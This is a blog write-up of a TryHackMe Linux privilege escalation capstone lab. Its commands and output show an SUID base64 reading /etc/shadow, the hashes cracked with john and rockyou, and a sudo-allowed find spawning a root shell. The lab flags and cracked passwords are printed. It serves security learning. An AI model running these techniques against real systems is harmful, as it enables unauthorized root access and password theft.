top of page
This site was designed with the
.com
website builder. Create your website today.Start Now
Search
  • aldern00b
    • Nov 19, 2023
    • 2 min read

THM - Linux Privilege Escalation: Capstone Challenge

OK, time to prove our worth after taking an entire course for the Jr. Pentester. Here we're going to test our privesc.


First things first, we're already SSH'd in as Leonard so we should start with a check on our sudo privlages


[leonard@ip-10-10-110-108 ~]$ sudo -l

<snip...>

Sorry, user leonard may not run sudo on ip-10-10-110-108.

Ok. let's step through the course. Next step: SUID bits

[leonard@ip-10-10-110-108 ~]$ find / -type f -perm -04000 -ls 2>/dev/null 
/usr/bin/base64 <-- gives SUDO, SUID

<snip...>

/usr/bin/mount <-- gives SUDO
/usr/bin/crontab <-- gives COMMAND, SUDO
/usr/bin/pkexec <-- gives SUDO
/usr/bin/at <-- gives SHELL, COMMAND, SUDO

<snip...>

We'll visit GTFOBins and check out each one until we find one with an SUID bit exploit. We're trying a few here but playing with the command option of base64 as it's the only one with an SUID bit set on it.

LFILE=/etc/shadow
./base64 "$LFILE" | base64 --decode

Bingo. We got the shadow file and the /etc/passwd file is readable by everyone... so we just need to save these to two different files, unshadow and let john do some crackin' for us. 

unshadow passwd.txt shadow.txt > passwords.txt

john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (missy)    
Penny123         (leonard)

And there we go. We got missy's password! We can do an su and move into that user now and read her flag.

cat /home/missy/Documents/flag1.txt
THM-42828719920544

Checking sudo permissions on missy tells us she's allowed to run find as sudo. 


$ sudo -l
Matching Defaults entries for missy on ip-10-10-170-36:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY
    HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User missy may run the following commands on ip-10-10-170-36:
    (ALL) NOPASSWD: /usr/bin/find

GTFOBins says we can grab an elevated shell with this:

sudo find . -exec /bin/sh \; -quit

We run the command and find the flag:


$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# cd /home/rootflag/
sh-4.2# ls -la
total 4
drwx------. 2 root root 23 Jun  7  2021 .
drwxr-xr-x. 5 root root 50 Jun  7  2021 ..
-rw-r--r--. 1 root root 20 Jun  7  2021 flag2.txt
sh-4.2# cat flag2.txt
THM-168824782390238

4 views0 comments

Recent Posts

See All

AlderN00b

I.T. Admin    |    Hacking    |    Learning

©2022 by AlderN00b. Proudly created with Wix.com

bottom of page